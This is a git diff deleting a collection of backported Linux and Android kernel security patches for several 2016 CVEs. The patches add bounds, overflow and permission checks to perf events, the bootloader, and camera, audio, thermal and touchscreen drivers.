b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0001.patch deleted file mode 100644 index 5f8608b5..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0001.patch +++ /dev/null 
@@ -1,132 +0,0 @@ -From e65cc8f9c46c6b8119826fbc22ffeb4e96e80e8a Mon Sep 17 00:00:00 2001 -From: Ben Hutchings -Date: Tue, 19 Jan 2016 21:35:15 +0000 -Subject: BACKPORT: perf tools: Document the perf sysctls - -perf_event_paranoid was only documented in source code and a perf error -message. Copy the documentation from the error message to -Documentation/sysctl/kernel.txt. - -Conflicts: - Documentation/sysctl/kernel.txt - tools/perf/util/evsel.c - -Signed-off-by: Ben Hutchings -Cc: Peter Zijlstra -Cc: linux-doc@vger.kernel.org -Link: http://lkml.kernel.org/r/20160119213515.GG2637@decadent.org.uk -[ Remove reference to external Documentation file, provide info inline, as before ] -Signed-off-by: Arnaldo Carvalho de Melo -Bug: 29054680 -Bug: 29119870 -Signed-off-by: Dennis Cagle -Change-Id: I13e73cfb2ad761c94762d0c8196df7725abdf5c5 -(cherry picked from commit 746938f9d97d74f6c2833a0ede49506bdfcd89e4) ---- - Documentation/sysctl/kernel.txt | 41 ++++++++++++++++++++++++++--------------- - tools/perf/util/evsel.c | 15 +++++++++------ - 2 files changed, 35 insertions(+), 21 deletions(-) - -diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt -index 550ece7..942d769 100644 ---- a/Documentation/sysctl/kernel.txt -+++ b/Documentation/sysctl/kernel.txt -@@ -51,8 +51,9 @@ show up in /proc/sys/kernel: - - overflowuid - - panic - - panic_on_oops --- panic_on_unrecovered_nmi - - panic_on_stackoverflow -+- panic_on_unrecovered_nmi -+- perf_event_paranoid - - pid_max - - powersave-nap [ PPC only ] - - printk -@@ -427,19 +428,6 @@ the recommended setting is 60. - - ============================================================== - --panic_on_unrecovered_nmi: -- --The default Linux behaviour on an NMI of either memory or unknown is --to continue operation. For many environments such as scientific --computing it is preferable that the box is taken out and the error --dealt with than an uncorrected parity/ECC error get propagated. 
-- --A small number of systems do generate NMI's for bizarre random reasons --such as power management so the default is off. That sysctl works like --the existing panic controls already in that directory. -- --============================================================== -- - panic_on_oops: - - Controls the kernel's behaviour when an oops or BUG is encountered. -@@ -459,7 +447,6 @@ This file shows up if CONFIG_DEBUG_STACKOVERFLOW is enabled. - - 0: try to continue operation. - --1: panic immediately. - - ============================================================== - -@@ -489,6 +476,30 @@ allowed to execute. - - ============================================================== - -+panic_on_unrecovered_nmi: -+ -+The default Linux behaviour on an NMI of either memory or unknown is -+to continue operation. For many environments such as scientific -+computing it is preferable that the box is taken out and the error -+dealt with than an uncorrected parity/ECC error get propagated. -+ -+A small number of systems do generate NMI's for bizarre random reasons -+such as power management so the default is off. That sysctl works like -+the existing panic controls already in that directory. -+ -+============================================================== -+ -+perf_event_paranoid: -+ -+Controls use of the performance events system by unprivileged -+users (without CAP_SYS_ADMIN). The default value is 1. 
-+ -+ -1: Allow use of (almost) all events by all users -+>=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK -+>=1: Disallow CPU event access by users without CAP_SYS_ADMIN -+>=2: Disallow kernel profiling by users without CAP_SYS_ADMIN -+ -+============================================================== - - pid_max: - -diff --git a/tools/perf/util/evsel.c b/tools/perf/util/evsel.c -index 63b6f8c..54494df 100644 ---- a/tools/perf/util/evsel.c -+++ b/tools/perf/util/evsel.c -@@ -1515,12 +1515,15 @@ int perf_evsel__open_strerror(struct perf_evsel *evsel, - case EPERM: - case EACCES: - return scnprintf(msg, size, -- "You may not have permission to collect %sstats.\n" -- "Consider tweaking /proc/sys/kernel/perf_event_paranoid:\n" -- " -1 - Not paranoid at all\n" -- " 0 - Disallow raw tracepoint access for unpriv\n" -- " 1 - Disallow cpu events for unpriv\n" -- " 2 - Disallow kernel profiling for unpriv", -+ "You may not have permission to collect %sstats.\n\n" -+ "Consider tweaking /proc/sys/kernel/perf_event_paranoid,\n" -+ "which controls use of the performance events system by\n" -+ "unprivileged users (without CAP_SYS_ADMIN).\n\n" -+ "The default value is 1:\n\n" -+ " -1: Allow use of (almost) all events by all users\n" -+ ">= 0: Disallow raw tracepoint access by users without CAP_IOC_LOCK\n" -+ ">= 1: Disallow CPU event access by users without CAP_SYS_ADMIN\n" -+ ">= 2: Disallow kernel profiling by users without CAP_SYS_ADMIN", - target->system_wide ? "system-wide " : ""); - case ENOENT: - return scnprintf(msg, size, "The %s event is not supported.", --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0002.patch deleted file mode 100644 index b12531f6..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0002.patch +++ /dev/null 
@@ -1,119 +0,0 @@ -From 149cf87192059fab0cb49ec5c691783c3565c215 Mon Sep 17 00:00:00 2001 -From: Jeff Vander Stoep -Date: Sun, 29 May 2016 14:22:32 -0700 -Subject: FROMLIST: security,perf: Allow further restriction of perf_event_open - -When kernel.perf_event_open is set to 3 (or greater), disallow all -access to performance events by users without CAP_SYS_ADMIN. -Add a Kconfig symbol CONFIG_SECURITY_PERF_EVENTS_RESTRICT that -makes this value the default. - -This is based on a similar feature in grsecurity -(CONFIG_GRKERNSEC_PERF_HARDEN). This version doesn't include making -the variable read-only. It also allows enabling further restriction -at run-time regardless of whether the default is changed. - -https://lkml.org/lkml/2016/1/11/587 - -Conflicts: - kernel/events/core.c - -Signed-off-by: Ben Hutchings -Signed-off-by: Dennis Cagle -Bug: 29054680 -Bug: 29119870 -Change-Id: Iff5bff4fc1042e85866df9faa01bce8d04335ab8 -(cherry picked from commit f16929ac8586f37949c638c738a6f0de969ed1ea) ---- - Documentation/sysctl/kernel.txt | 4 +++- - include/linux/perf_event.h | 5 +++++ - kernel/events/core.c | 6 ++++++ - security/Kconfig | 9 +++++++++ - 4 files changed, 23 insertions(+), 1 deletion(-) - -diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt -index 942d769..d438fd2 100644 ---- a/Documentation/sysctl/kernel.txt -+++ b/Documentation/sysctl/kernel.txt -@@ -492,12 +492,14 @@ the existing panic controls already in that directory. - perf_event_paranoid: - - Controls use of the performance events system by unprivileged --users (without CAP_SYS_ADMIN). The default value is 1. -+users (without CAP_SYS_ADMIN). The default value is 3 if -+CONFIG_SECURITY_PERF_EVENTS_RESTRICT is set, or 1 otherwise. 
- - -1: Allow use of (almost) all events by all users - >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK - >=1: Disallow CPU event access by users without CAP_SYS_ADMIN - >=2: Disallow kernel profiling by users without CAP_SYS_ADMIN -+>=3: Disallow all event access by users without CAP_SYS_ADMIN - - ============================================================== - -diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h -index 4410efa..86b43c1 100644 ---- a/include/linux/perf_event.h -+++ b/include/linux/perf_event.h -@@ -715,6 +715,11 @@ extern int perf_cpu_time_max_percent_handler(struct ctl_table *table, int write, - loff_t *ppos); - - -+static inline bool perf_paranoid_any(void) -+{ -+ return sysctl_perf_event_paranoid > 2; -+} -+ - static inline bool perf_paranoid_tracepoint_raw(void) - { - return sysctl_perf_event_paranoid > -1; -diff --git a/kernel/events/core.c b/kernel/events/core.c -index 7ab36de..e8cae75 100644 ---- a/kernel/events/core.c -+++ b/kernel/events/core.c -@@ -166,9 +166,12 @@ static struct srcu_struct pmus_srcu; - * 0 - disallow raw tracepoint access for unpriv - * 1 - disallow cpu events for unpriv - * 2 - disallow kernel profiling for unpriv -+ * 3 - disallow all unpriv perf event use - */ - #ifdef CONFIG_PERF_EVENTS_USERMODE - int sysctl_perf_event_paranoid __read_mostly = -1; -+#elif defined CONFIG_SECURITY_PERF_EVENTS_RESTRICT -+int sysctl_perf_event_paranoid __read_mostly = 3; - #else - int sysctl_perf_event_paranoid __read_mostly = 1; - #endif -@@ -6826,6 +6829,9 @@ SYSCALL_DEFINE5(perf_event_open, - if (flags & ~PERF_FLAG_ALL) - return -EINVAL; - -+ if (perf_paranoid_any() && !capable(CAP_SYS_ADMIN)) -+ return -EACCES; -+ - err = perf_copy_attr(attr_uptr, &attr); - if (err) - return err; -diff --git a/security/Kconfig b/security/Kconfig -index 0114543..66a5f80 100644 ---- a/security/Kconfig -+++ b/security/Kconfig -@@ -18,6 +18,15 @@ config SECURITY_DMESG_RESTRICT - - If you are unsure how to answer this 
question, answer N. - -+config SECURITY_PERF_EVENTS_RESTRICT -+ bool "Restrict unprivileged use of performance events" -+ depends on PERF_EVENTS -+ help -+ If you say Y here, the kernel.perf_event_paranoid sysctl -+ will be set to 3 by default, and no unprivileged use of the -+ perf_event_open syscall will be permitted unless it is -+ changed. -+ - config SECURITY - bool "Enable different security models" - depends on SYSFS --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0003.patch deleted file mode 100644 index 5881ba06..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0003.patch +++ /dev/null @@ -1,30 +0,0 @@ -From 8fe72ba71e08fbc2c5a5d4985557247904d76054 Mon Sep 17 00:00:00 2001 -From: Dennis Cagle -Date: Mon, 15 Aug 2016 14:35:18 -0700 -Subject: msm_defconfig: Enable config for b/29119870 - -Restriction of kernel performance events requires -a change to the defconfig. - -Bug: 29119870 -Change-Id: Ib7e565a52446e2dcae1aa8c561d4770f2762a4d7 -Signed-off-by: Dennis Cagle ---- - arch/arm64/configs/msm_defconfig | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig -index 0473936..7755ea1 100644 ---- a/arch/arm64/configs/msm_defconfig -+++ b/arch/arm64/configs/msm_defconfig -@@ -620,6 +620,7 @@ CONFIG_KERNEL_TEXT_RDONLY=y - CONFIG_KEYS=y - CONFIG_SECURITY=y - CONFIG_SECURITY_NETWORK=y -+CONFIG_SECURITY_PERF_EVENTS_RESTRICT=y - CONFIG_LSM_MMAP_MIN_ADDR=4096 - CONFIG_SECURITY_SELINUX=y - CONFIG_CRYPTO=y --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0004.patch deleted file mode 100644 index ec5ae396..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0004.patch +++ /dev/null 
@@ -1,35 +0,0 @@
-From 15c897f31ba18f67559d6b7f1a6afa855baa756c Mon Sep 17 00:00:00 2001
-From: Jeff Vander Stoep
-Date: Wed, 1 Jun 2016 13:44:47 -0700
-Subject: ANDROID: restrict access to perf events
-
-Add:
-CONFIG_SECURITY_PERF_EVENTS_RESTRICT=y
-
-to android-base.cfg
-
-The kernel.perf_event_paranoid sysctl is set to 3 by default.
-No unprivileged use of the perf_event_open syscall will be
-permitted unless it is changed.
-
-Bug: 29054680
-Change-Id: Ie7512259150e146d8e382dc64d40e8faaa438917
----
- android/configs/android-base.cfg | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/android/configs/android-base.cfg b/android/configs/android-base.cfg
-index 85e4a93..f820d56 100644
---- a/android/configs/android-base.cfg
-+++ b/android/configs/android-base.cfg
-@@ -143,6 +143,7 @@ CONFIG_RTC_CLASS=y
- CONFIG_RT_GROUP_SCHED=y
- CONFIG_SECURITY=y
- CONFIG_SECURITY_NETWORK=y
-+CONFIG_SECURITY_PERF_EVENTS_RESTRICT=y
- CONFIG_SECURITY_SELINUX=y
- CONFIG_SETEND_EMULATION=y
- CONFIG_STAGING=y
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3850/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3850/ANY/0001.patch
deleted file mode 100644
index ff93d534..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3850/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 9a59b04c8ed8b57537f2f3cbcb06645575f64ac1 Mon Sep 17 00:00:00 2001
-From: Vijay Kumar Pendoti
-Date: Thu, 9 Jun 2016 19:34:01 +0530
-Subject: app: aboot: add integer overflow in booting from emmc
-
-Added integer overflow checks in case of booting from emmc.
-
-Change-Id: If251c7d83a8658a6507e4bbc2a4b86a777505081
----
- app/aboot/aboot.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/app/aboot/aboot.c b/app/aboot/aboot.c
-index b59aa5d..6418ecb 100644
---- a/app/aboot/aboot.c
-+++ b/app/aboot/aboot.c
-@@ -1077,8 +1077,16 @@ int boot_linux_from_mmc(void)
-
- #if DEVICE_TREE
- dt_actual = ROUND_TO_PAGE(hdr->dt_size, page_mask);
-+ if (UINT_MAX < ((uint64_t)kernel_actual + (uint64_t)ramdisk_actual+ (uint64_t)dt_actual + page_size)) {
-+ dprintf(CRITICAL, "Integer overflow detected in bootimage header fields at %u in %s\n",__LINE__,__FILE__);
-+ return -1;
-+ }
- imagesize_actual = (page_size + kernel_actual + ramdisk_actual + dt_actual);
- #else
-+ if (UINT_MAX < ((uint64_t)kernel_actual + (uint64_t)ramdisk_actual + page_size)) {
-+ dprintf(CRITICAL, "Integer overflow detected in bootimage header fields at %u in %s\n",__LINE__,__FILE__);
-+ return -1;
-+ }
- imagesize_actual = (page_size + kernel_actual + ramdisk_actual);
- #endif
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3854/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3854/ANY/0001.patch
deleted file mode 100644
index 3c57c8ec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3854/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From cc96def76dfd18fba88575065b29f2ae9191fafa Mon Sep 17 00:00:00 2001
-From: Terence Ho
-Date: Thu, 5 Nov 2015 14:49:03 -0500
-Subject: msm: camera: Add check to prevent array index out of bounds
-
-Add check in msm_mctl_buf_return_buf to prevent array index
-out-of-bounds.
-
-Change-Id: Ie0bbbb1c97e8851ef004074726e90c78d5cdefa7
-Signed-off-by: Terence Ho
----
- drivers/media/video/msm/msm_mctl_buf.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/media/video/msm/msm_mctl_buf.c b/drivers/media/video/msm/msm_mctl_buf.c
-index e258097..8b37391 100644
---- a/drivers/media/video/msm/msm_mctl_buf.c
-+++ b/drivers/media/video/msm/msm_mctl_buf.c
-@@ -917,6 +917,12 @@ int msm_mctl_buf_return_buf(struct msm_cam_media_controller *pmctl,
- struct msm_cam_v4l2_device *pcam = pmctl->pcam_ptr;
- unsigned long flags = 0;
-
-+ if (image_mode < 0 || image_mode >= MSM_MAX_IMG_MODE) {
-+ pr_err("%s: image_mode %d out-of-bounds",
-+ __func__, image_mode);
-+ return -EINVAL;
-+ }
-+
- if (pcam->mctl_node.dev_inst_map[image_mode]) {
- idx = pcam->mctl_node.dev_inst_map[image_mode]->my_index;
- pcam_inst = pcam->mctl_node.dev_inst[idx];
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3855/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3855/ANY/0001.patch
deleted file mode 100644
index 24f90187..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3855/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From ab3f46119ca10de87a11fe966b0723c48f27acd4 Mon Sep 17 00:00:00 2001
-From: Manaf Meethalavalappu Pallikunhi
-Date: Wed, 30 Mar 2016 17:12:16 +0530
-Subject: msm: limits: Check user buffer size before copying to local buffer
-
-User input data is passed in from userspace through debugfs interface
-of supply lm core to validate supply lm core functionality. Ensure
-user buffer size is not greater than expected stack buffer size
-to avoid out of bounds array accesses.
-
-Change-Id: I5a93774855241b50895c5e2b3ff939e4c33a0185
-Signed-off-by: Manaf Meethalavalappu Pallikunhi
----
- drivers/thermal/supply_lm_core.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/supply_lm_core.c b/drivers/thermal/supply_lm_core.c
-index fc8e807..a4d137f 100644
---- a/drivers/thermal/supply_lm_core.c
-+++ b/drivers/thermal/supply_lm_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -303,6 +303,11 @@ static ssize_t supply_lm_input_write(struct file *fp,
- enum corner_state gpu;
- enum corner_state modem;
-
-+ if (count > (MODE_MAX - 1)) {
-+ pr_err("Invalid user input\n");
-+ return -EINVAL;
-+ }
-+
- if (copy_from_user(&buf, user_buffer, count))
- return -EFAULT;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3857/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3857/ANY/0001.patch
deleted file mode 100644
index 6a2d672d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3857/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From d948109df11c8485e972b4cc0eb4820d4b754615 Mon Sep 17 00:00:00 2001
-From: Dave Weinstein
-Date: Thu, 28 Jul 2016 11:55:41 -0700
-Subject: arm: oabi compat: add missing access checks
-
-commit 7de249964f5578e67b99699c5f0b405738d820a2 upstream.
-
-Add access checks to sys_oabi_epoll_wait() and sys_oabi_semtimedop().
-This fixes CVE-2016-3857, a local privilege escalation under
-CONFIG_OABI_COMPAT.
-
-Cc: stable@vger.kernel.org
-Reported-by: Chiachih Wu
-Reviewed-by: Kees Cook
-Reviewed-by: Nicolas Pitre
-Signed-off-by: Dave Weinstein
-Signed-off-by: Linus Torvalds
-Signed-off-by: Willy Tarreau
----
- arch/arm/kernel/sys_oabi-compat.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/arch/arm/kernel/sys_oabi-compat.c b/arch/arm/kernel/sys_oabi-compat.c
-index 3e94811..a0aee80 100644
---- a/arch/arm/kernel/sys_oabi-compat.c
-+++ b/arch/arm/kernel/sys_oabi-compat.c
-@@ -275,8 +275,12 @@ asmlinkage long sys_oabi_epoll_wait(int epfd,
- mm_segment_t fs;
- long ret, err, i;
-
-- if (maxevents <= 0 || maxevents > (INT_MAX/sizeof(struct epoll_event)))
-+ if (maxevents <= 0 ||
-+ maxevents > (INT_MAX/sizeof(*kbuf)) ||
-+ maxevents > (INT_MAX/sizeof(*events)))
- return -EINVAL;
-+ if (!access_ok(VERIFY_WRITE, events, sizeof(*events) * maxevents))
-+ return -EFAULT;
- kbuf = kmalloc(sizeof(*kbuf) * maxevents, GFP_KERNEL);
- if (!kbuf)
- return -ENOMEM;
-@@ -313,6 +317,8 @@ asmlinkage long sys_oabi_semtimedop(int semid,
-
- if (nsops < 1 || nsops > SEMOPM)
- return -EINVAL;
-+ if (!access_ok(VERIFY_READ, tsops, sizeof(*tsops) * nsops))
-+ return -EFAULT;
- sops = kmalloc(sizeof(*sops) * nsops, GFP_KERNEL);
- if (!sops)
- return -ENOMEM;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3858/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3858/ANY/0001.patch
deleted file mode 100644
index 6febaff9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3858/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From cab2ba71f13f04aa73c8b8dadc3fc184205c9474 Mon Sep 17 00:00:00 2001
-From: Srinivasarao P
-Date: Mon, 6 Jun 2016 12:33:50 +0530
-Subject: qcom: ssr: Fix possible overflow when copying firmware name
-
-Array overflow can occur in firmware_name_store(), if the variable
-buf contains the string larger than size of subsys->desc->fw_name
-
-Change-Id: Ice39d7a1eb0b5f53125cc5d528021a99b9f7ff90
-Signed-off-by: Srinivasarao P
----
- drivers/soc/qcom/subsystem_restart.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/subsystem_restart.c b/drivers/soc/qcom/subsystem_restart.c
-index de3a5a4..c6dbf2e 100644
---- a/drivers/soc/qcom/subsystem_restart.c
-+++ b/drivers/soc/qcom/subsystem_restart.c
-@@ -293,7 +293,8 @@ static ssize_t firmware_name_store(struct device *dev,
-
- pr_info("Changing subsys fw_name to %s\n", buf);
- mutex_lock(&track->lock);
-- strlcpy(subsys->desc->fw_name, buf, count + 1);
-+ strlcpy(subsys->desc->fw_name, buf,
-+ min(count + 1, sizeof(subsys->desc->fw_name)));
- mutex_unlock(&track->lock);
- return count;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3859/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-3859/3.10/0001.patch
deleted file mode 100644
index ef80afd2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3859/3.10/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From fe297dc01f7ea95bb1bff25f6fc4257f0ef832ff Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj
-Date: Wed, 29 Jun 2016 14:34:31 +0530
-Subject: msm: camera: Fix memory read security flaw
-
-Adds bound check on reg_cfg_cmd->u.dmi_info.hi_tbl_offset.
-
-IOCTL VIDIOC_MSM_VFE_REG_CFG uses usersupplied value without
-performing bounds check for following cmd_type.
-VFE_READ_DMI_16BIT
-VFE_READ_DMI_32BIT
-VFE_READ_DMI_64BIT
-
-Change-Id: I554c45ef3a172f5b5891b67a7e8e7a1f3f3882ed
-Signed-off-by: Trishansh Bhardwaj
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 7ea77dd..4f4884a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -969,7 +969,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- case VFE_READ_DMI_16BIT:
- case VFE_READ_DMI_32BIT:
- case VFE_READ_DMI_64BIT: {
-- if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-+ if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT ||
-+ reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
- if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <=
- reg_cfg_cmd->u.dmi_info.lo_tbl_offset) ||
- (reg_cfg_cmd->u.dmi_info.hi_tbl_offset -
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3859/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-3859/3.18/0002.patch
deleted file mode 100644
index c65b1d80..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3859/3.18/0002.patch
+++ /dev/null
@@ -1,36 +0,0 @@ -From 61b419297e13ed9a28e9b880548b2d96d4aa6c0d Mon Sep 17 00:00:00 2001 -From: Trishansh Bhardwaj -Date: Wed, 29 Jun 2016 14:34:31 +0530 -Subject: msm: camera: Fix memory read by adding bounds check - -Adds bound check on reg_cfg_cmd->u.dmi_info.hi_tbl_offset. - -IOCTL VIDIOC_MSM_VFE_REG_CFG uses usersupplied value without -performing bounds check for following cmd_type. -VFE_READ_DMI_16BIT -VFE_READ_DMI_32BIT -VFE_READ_DMI_64BIT - -Change-Id: I554c45ef3a172f5b5891b67a7e8e7a1f3f3882ed -Signed-off-by: Trishansh Bhardwaj ---- - drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -index 8e7cb68..86392c6 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -@@ -1234,7 +1234,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - case VFE_READ_DMI_16BIT: - case VFE_READ_DMI_32BIT: - case VFE_READ_DMI_64BIT: { -- if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) { -+ if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT || -+ reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) { - if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <= - reg_cfg_cmd->u.dmi_info.lo_tbl_offset) || - (reg_cfg_cmd->u.dmi_info.hi_tbl_offset - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3860/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3860/ANY/0001.patch deleted file mode 100644 index 05688a3b..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3860/ANY/0001.patch +++ /dev/null @@ -1,7585 +0,0 @@ - - - -kernel/msm-3.18 - Unnamed repository - - - - - - - - - -
Diffstat (limited to 'sound/soc/msm/qdsp6v2/audio_calibration.c')
-
-rw-r--r--sound/soc/msm/qdsp6v2/audio_calibration.c10
1 files changed, 8 insertions, 2 deletions
diff --git a/sound/soc/msm/qdsp6v2/audio_calibration.c b/sound/soc/msm/qdsp6v2/audio_calibration.c
index c4ea4ed..60d09df 100644
--- a/sound/soc/msm/qdsp6v2/audio_calibration.c
+++ b/sound/soc/msm/qdsp6v2/audio_calibration.c
@@ -1,4 +1,4 @@
-/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
+/* Copyright (c) 2014, 2016 The Linux Foundation. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
@@ -490,7 +490,13 @@ static long audio_cal_shared_ioctl(struct file *file, unsigned int cmd,
goto unlock;
if (data == NULL)
goto unlock;
- if (copy_to_user((void *)arg, data,
+ if ((sizeof(data->hdr) + data->hdr.cal_type_size) > size) {
+ pr_err("%s: header size %zd plus cal type size %d are greater than data buffer size %d\n",
+ __func__, sizeof(data->hdr),
+ data->hdr.cal_type_size, size);
+ ret = -EFAULT;
+ goto unlock;
+ } else if (copy_to_user((void *)arg, data,
sizeof(data->hdr) + data->hdr.cal_type_size)) {
pr_err("%s: Could not copy cal type to user\n",
__func__);
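Review bot: The new bound in audio_cal_shared_ioctl() computes `sizeof(data->hdr) + data->hdr.cal_type_size` twice, once in the check and once as the `copy_to_user()` length, and prints the `size_t` term with `%zd`. Computing it once, e.g. `size_t len = sizeof(data->hdr) + data->hdr.cal_type_size;`, and using `len` in both places keeps the check and the copy from drifting apart, and `%zu` is the matching specifier. `cal_type_size` and `size` are printed with `%d`, so they look signed; if they are, a negative `cal_type_size` is converted to a large unsigned value in this sum and is worth rejecting explicitly. The declarations are outside the hunk, so the types should be confirmed there.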
- -
- - diff --git a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3865/ANY/0001.patch deleted file mode 100644 index 7f461976..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0001.patch +++ /dev/null 
@@ -1,86 +0,0 @@ -From a92e71c20f4e6b2aa94b7614fd494833ea76b8b9 Mon Sep 17 00:00:00 2001 -From: Biswajit Paul -Date: Thu, 30 Jun 2016 19:00:50 -0700 -Subject: [PATCH] input: synaptics: allocate heap memory for temp buf - -rmidev file operations structure include write() and -read() which accepts data from user space. Temp -buffers are allocated through variable length arrays -which can pose security problems. So allocate memory -on heap instead of stack to avoid this. - -Bug: 28799389 -CRs-Fixed: 1032459 -Change-Id: I44443f91d435715dd0097ef8e8dfc48e291f93fc -Signed-off-by: Mohan Pallaka -Signed-off-by: Biswajit Paul ---- - drivers/input/touchscreen/synaptics_rmi_dev.c | 19 +++++++++++++++---- - 1 file changed, 15 insertions(+), 4 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_rmi_dev.c b/drivers/input/touchscreen/synaptics_rmi_dev.c -index 88595582579e0..e2d7c27eb6832 100644 ---- a/drivers/input/touchscreen/synaptics_rmi_dev.c -+++ b/drivers/input/touchscreen/synaptics_rmi_dev.c -@@ -291,7 +291,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf, - size_t count, loff_t *f_pos) - { - ssize_t retval; -- unsigned char tmpbuf[count + 1]; -+ unsigned char *tmpbuf; - struct rmidev_data *dev_data = filp->private_data; - - if (IS_ERR(dev_data)) { -@@ -305,6 +305,10 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf, - if (count > (REG_ADDR_LIMIT - *f_pos)) - count = REG_ADDR_LIMIT - *f_pos; - -+ tmpbuf = kzalloc(count + 1, GFP_KERNEL); -+ if (!tmpbuf) -+ return -ENOMEM; -+ - mutex_lock(&(dev_data->file_mutex)); - - retval = rmidev->fn_ptr->read(rmidev->rmi4_data, -@@ -322,6 +326,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf, - clean_up: - mutex_unlock(&(dev_data->file_mutex)); - -+ kfree(tmpbuf); - return retval; - } - -@@ -337,7 +342,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf, - size_t count, loff_t *f_pos) - { - ssize_t retval; -- unsigned char tmpbuf[count + 1]; -+ 
